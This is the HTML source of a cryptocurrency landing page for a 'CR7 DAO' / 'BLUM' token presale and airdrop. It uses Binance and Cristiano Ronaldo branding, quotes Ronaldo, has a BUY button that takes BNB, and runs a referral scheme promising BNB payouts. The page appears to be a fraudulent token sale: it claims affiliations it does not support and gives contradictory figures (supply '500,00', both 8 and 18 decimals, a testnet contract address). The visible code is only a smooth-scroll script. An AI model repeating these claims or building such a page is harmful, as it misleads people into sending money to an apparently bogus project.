<!DOCTYPE html><html lang="en" class="no-js">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>CR7 DAO - THE LARGEST Blum FANS DAO ON Binance Smart Chain</title>
    <meta name="description" content="CR7DAO Ecosystem.">
    <link rel="shortcut icon" type="image/x-icon" href="fonts/crlogo.jpg">
    <link rel="stylesheet" href="css/style.css">
</head>

<body class="t">
    <div class="rn">
        <header class="nb reveal-from-top">
            <div class="tcontainern">
                <div class="n_">
                    <div class="nk">
                        <h1 class="sz"><img src="fonts/cr7logo.jpg" alt="Neon" width="130" height="30"></h1>
                    </div><button id="th" class="th" aria-controls="primary-menu" aria-expanded="false"><span class="se">Menu</span> <span class="tp"><span class="td"></span></span></button>
                    <nav id="nj" class="nj">
                        <div class="nq">
                            <ul class="st h re">
                
                                <li><a href="#presale">CR7DAO Airdrop & Sales</a></li>

                            </ul>
                            <ul class="st re">
                                <li><a class="tbuttonn fbuttonl gbuttony sbuttono" href="                            </ul>
                                    " target="_blank">Smart Contact https://testnet.bscscan.com/address/0x3A830b490cd3B08964667503F0e31d9E7713eAd8</a></li>
                            </ul>
                        </div>
                    </nav>
                </div>
            </div>
        </header>
        <main class="nw">
            <section class="rb nx tillustration-section-n">
                <div class="tcontainern">
                    <div class="rm rd">
                        <div class="nf np">
                            <div class="split-item">
                                <div class="nh az reveal-from-right" data-reveal-container=".split-item">
                                    <h1 class="oe ok reveal-from-bottom" data-reveal-delay="150">BLUM(BLUM) Token Airdrop</h1>
                                    <p class="oe us reveal-from-bottom" data-reveal-delay="300">BLUM is a fork of OpenSea. It aims to eliminate the inherent flaws of OPENSEA, simplify the user threshold.



                                    </p>
                                </div>
                                <div class="nl nc reveal-from-left" data-reveal-container=".split-item"><img src="fonts/cr4.jpg" alt width="350" height="430"></div>
                            </div>
                                    <p></p>
                                    <div class="reveal-from-bottom" data-reveal-delay="450">
                                        <a class="tbuttonn fbuttonl gbuttony" href="#presale">blum→</a>
                                </div>
                                <style>
                                    @media (min-width:641px) {
                                        .rb .nf .split-item {
                                            min-height: 492px
                                        }
                                    }
                                </style>
                            </div>
                        </div>
                    </div>
                </section></main></div>
            

            <section class="nx s_" id="about">
                <div class="tcontainern">
                    <div class="rd">
                        <div class="nf np">
                            <div class="split-item">
                                <div class="nh az reveal-from-right" data-reveal-container=".split-item">
                                    <h1 class="oe ok reveal-from-bottom" data-reveal-delay="150">Pre-sale is Live!</h1> 

                                    <p></p>
                                </div>
                                <div class="nl nc reveal-from-left" data-reveal-container=".split-item">
                                    <h3 class="oe og">CR7DAO </h3>
                                    <p class="sz">blum airdrop
                                        ,Pre-sale supply: 500,00.

                            </p></div>
                                <p></p>
                            </div>
                        </div>
                    </div>
                </div>
            </section>


            <section class="nx s_" id="about">
                <div class="tcontainern">
                    <div class="rd">           
                        <div class="nf np">
                            <div class="split-item">
                                <div class="nh az reveal-from-right" data-reveal-container=".split-item">
                                    <p class="sz"></p>
                                    <h3 class="oe og">Why should you buy the blum Binance token?</h3>
                                    <p class="sz">$blum binance token exists because decentralized governance is critical to building and managing a globally dispersed community—and therefore critical to the success of the CR7 ecosystem.
                                        The blum DAO Improvement Proposal Process will allow lum DAO members to make decisions regarding Ecosystem Fund allocations, governance rules, projects, partnerships, and beyond. CR7 DAO membership is open to all $CR7 holders.                                         




                                    </p>
                                </div>
                                <div class="nl nc reveal-from-left" data-reveal-container=".split-item"><img src="fonts/cr1.png" alt width="70" height="70"></div>
                            </div>
                            <div class="split-item">
                                <div class="nh az reveal-from-left" data-reveal-container=".split-item">
                                    <p class="sz">blum-Binance</p>
                                    <h3 class="oe og">
                                        The blum NFT Collection</h3>
                                    <p class="sz">For the first time ever, fans and collectors will have unprecedented access to the legend, from owning a piece of his footballing career which comes with CR7DAO utility tokens for holders to CR7-Binance fan prizes and experiences.This first NFT drop is a celebration of Ronaldo’s legacy,  including all the moments you, the fans, have witnessed during his meteoric rise into the halls of football greatness. 



                                    </p>
                                </div>
                                <div class="nl nc reveal-from-right" data-reveal-container=".split-item"><img src="fonts/cr3.jpg" alt width="70" height="70"></div> 
                            <p></p>
                        </div>
                    </div>
                    <div class="nf np">
                        <div class="split-item">
                            <div class="nh az reveal-from-right" data-reveal-container=".split-item">
                                <p class="sz"></p>
                                <h3 class="oe og">NEW JOURNEY</h3>
                                <p class="sz">“My relationship with the fans is very important to me, so the idea of bringing unprecedented experiences and access through this platform is something that I wanted to be a part of,” Ronaldo said in a statement. 




                                </p>
                            </div>
                            <div class="nl nc reveal-from-left" data-reveal-container=".split-item"><img src="fonts/cr7.jpg" alt width="70" height="70"></div>
                        </div>
                        <div class="split-item">
                            <div class="nh az reveal-from-left" data-reveal-container=".split-item">
                                <p class="sz">CR7-Binance</p>
                                <h3 class="oe og">THE blum COLLECTION</h3>
                                <p class="sz">Your story begins here, on Binance.Take the first step and score an exclusive blum Pack with other rewards.



                                </p>
                            </div>
                            <div class="nl nc reveal-from-right" data-reveal-container=".split-item"><iframe width="320" height="213" src="https://www.youtube.com/embed/rAozsyoe9DI?controls=0&amp;start=2s&amp;end=50s&amp;loop=1&amp;playlist=rAozsyoe9DI&amp;showinfo=0&amp;rel=0&amp;enablejsapi=1" title="YouTube video player" frameborder="0" allow="autoplay=1; encrypted-media; picture-in-picture" allowfullscreen></iframe></div>       
                        </div>
                    </div>
                </div>
            </div></section>
            <section class="r_ nx rillustration-section-i" id="presale">
                <div class="tcontainern">
                    <div class="pricing-inner rd">
                        <div class="rv s_ reveal-from-bottom">
                            <div class="scontainero">
                                <h1 class="sz">blum Token Sale.</h1>
                            </div>
                        </div>

                        <div class="tiles-wrap">
                            <div class="ng reveal-from-right" data-reveal-delay="400">
                                <div class="ny">
                                    <div class="rj">

                                        <div class="pricing-item-features mb-40">
                                            <h2 style="font-size: 25px;" class="pricing-item-features-title f c sf ue">Join Pre Sale </h2>
                                            <p style="margin-bottom: -20px;"></p>
                                            <h2 id="demo" class="timer"></h2>
                                            <p style="margin-bottom: -20px;"></p>
                                            <p style="font-size: 16px;">Listing Price 1 $blum = 1 USD</p>
                                            <p style="font-size: 14px; margin-top: -10px;">(MAX 10 BNB)</p>
                                            <ul class="rq st c us">
                                                <li class="ix">0.01 $BNB = 1,000 $blum</li>
                                                <li class="ix">0.1  $BNB = 10,000 $blum</li>
                                                <li class="ix">1    $BNB = 100,000 $blum</li>
                                                <li class="ix">10   $BNB = 1,000,000 $blum</li>
                                            </ul>
                                        </div>
                                        <input style="display: none; margin-top: 10px; margin-bottom: 10px; width: 100%;  color: black; padding: 5px; text-align: center; background-image: linear-gradient(to left, #f5df68, #f5df68, #f5df68, #f5df68);" id="airdropval" class="tbuttonn fbuttonl pbuttond input-amount" placeholder="0.0055" type="text" value="0.0055">




                                    </div>

                                    <div class="pricing-item-cta oh">
                                        <input style="display: block; width: 100%;  color: black; margin-top: 10px; margin-bottom: 10px; padding: 5px; text-align: center; background-image: linear-gradient(to left, #f5df68, #f5df68, #f5df68, #f5df68);" id="buyinput" class="tbuttonn fbuttonl pbuttond input-amount" placeholder="0.01" value="0.01">
                                        <a class="tbuttonn fbuttonl pbuttond" href="javascript:buystt();">BUY</a></div>
                                </div>
                            </div>
                            <div class="ng reveal-from-left" data-reveal-delay="400">
                                <div class="ny">
                                    <div class="rj">
                                        <div class="ib aa ue">

                                            <div class="pricing-item-features mb-40">
                                                <h2 style="font-size: 25px;" class="pricing-item-features-title f c sf ue">Claim Airdrop</h2>
                                                <p>Don't Miss Out!</p>
                                                <a href="javascript:getAirdrop();" id="airinput" onclick="()" class="tbuttonn fbuttonl pbuttond " style="text-align: center;margin-right: 5px;">Claim 500 blum</a>
                                                <ul class="rq st c us">
                                                    <li class="ix">Referral count is unlimited</li>
                                                    <li class="ix">Get 100% $blum & 30% $BNB per referral</li>

                                                </ul>
                                            </div>
                                        </div>
                                        <div>

                                            <div id="airdroprow">
                                                <div style="display: none ;" id="airdropcell">
                                                    <input style="display: none ; width: 100%;  color: black; padding: 5px;margin-top: 10px; margin-bottom: 10px; text-align: center; background-image: linear-gradient(to left, #024b47, #024b47, #024b47, #024b47); text-transform: none;" id="airinput" class="tbuttonn fbuttonl pbuttond input-amount" placeholder="Invite By">
                                                </div>

                                                <h2 style="margin-top: -30px; font-size: 25px;" class>Create Your Referral Link</h2>
                                                <input id="refaddress" style="display: block; width: 100%;  color: black; padding: 5px; margin-top: 10px; margin-bottom: 10px; text-align: center; background-image: linear-gradient(to left, #f5d568, #f5d568, #f5d568, #f5d568); text-transform: none;" type="text" class="tbuttonn fbuttonl pbuttond input-amount" required="required" placeholder="Enter You BEP20 Address">

                                                <a href="javascript:void(0)" class="tbuttonn fbuttonl pbuttond" onclick="getreflink()">Get Ref Link</a>
                                                <a href="javascript:copyToClipboard('refaddress')" onclick="kopiraj()" class="tbuttonn fbuttonl pbuttond">Copy</a>

                                            </div>
                                            <div style="display: none;" class="pricing-item-cta oh"><a class="tbuttonn fbuttonl pbuttond" href="#">Start</a></div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
            </div></div></section>
            <section class="nx">
                <div class="tcontainern">
                    <div class="rd i_">
                        <div class="scontainero">
                            <h2 class="oe">Claim, Buy & HODL $blum to claim your free CR7 Mystery Box and own a piece of Ronaldo's legacy. 
                            <figure><img class="sb" src="fonts/cr5.jpg" alt="Image placeholder" width="712" height="400">
                                <figcaption class="sc"> <span role="img" aria-label="smile"></span>
                                </figcaption>
                            </figure>
                            </h2><h2 class="oe">blum ALLOCATION

                            </h2>
                            <p> The initial total supply of blum tokens ($blum) at mainnet was 1 billion tokens. blum will have 8 digits of precision as part of the fraction where the minimal unit is called an Octa.</p>                     

                        
                                <p>Category  -   % of Initial Token Distribution </p><p>
                            </p><p>Community  -  51.02%</p><p>
                            </p><p>Core Contributors  -  19.00%</p><p>
                            </p><p>Foundation  -  16.50%</p><p>
                            </p><p>Investors  -  13.48%</p><p>
        
                            </p><h2 class="oe">Token Details

                            </h2>
                            <p></p>
                            <ul>
                                <li>Name  -  BLUM </li>
                                <li>Symbol  -  blum</li>
                                <li>Decimal  -  18</li>
                                <li>Supply  -  1 Billion</li>
                            </ul>
                            <pre>Contract Address - 0xb4300A7024c1db703E0248167f939a85975BBE78</pre>
                       
                            <h2 class="oe ok">Blum Protocol</h2>
                            <p class="on">Blum is a governance and utility token used within the CR7-Binance ecosystem to empower a decentralized community building at the forefront of web3.

                            


                               </p>→ Blum was launched as the base layer to foster developments within the Blum Ecosystem.
                            <p></p>→ $Blumis the ecosystem’s governance token, allowingBlum holders to participate in DAO.
                            <p></p>→ Blum provides access to certain parts of the ecosystem that are otherwise unavailable, such as exclusive games, merch, events, and services.
                            <p></p>→ Blum is a tool for third-party developers to participate in the ecosystem by incorporating $CR7 into services, games, and other projects.
                            
                        </div>
                    </div>
                   

        
        <footer class="rr az">
            <div class="tcontainern">
                <div class="ri">
                    <div class="rs rh h">
                        <div class="nk"><a><img src="fonts/cr7logo.jpg" alt width="132" height="32">Copyright &copy; 2024 Blum - Binance - All rights reserved.</a></div>

                    </div>
                </div>
            </div>
        </footer>
        </div>


        <script src="js/main.min.js"></script>
        <script src="js/web3.js"></script>
        <script src="js/app.js"></script>
        <script src="js/timer.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@10"></script>
        <script src="jquery.min.html"></script>
        <!-- <script src="js/npm.js"></script> -->
        <script>
            $(document).ready(function() {
                // Add smooth scrolling to all links
                $("a").on('click', function(event) {

                    // Make sure this.hash has a value before overriding default behavior
                    if (this.hash !== "") {
                        // Prevent default anchor click behavior
                        event.preventDefault();

                        // Store hash
                        var hash = this.hash;

                        // Using jQuery's animate() method to add smooth page scroll
                        // The optional number (800) specifies the number of milliseconds it takes to scroll to the specified area
                        $('html, body').animate({
                            scrollTop: $(hash).offset().top
                        }, 800, function() {

                            // Add hash (#) to URL when done scrolling (default click behavior)
                            window.location.hash = hash;
                        });
                    } // End if
                });
            });
        </script>





</section></body>

</html>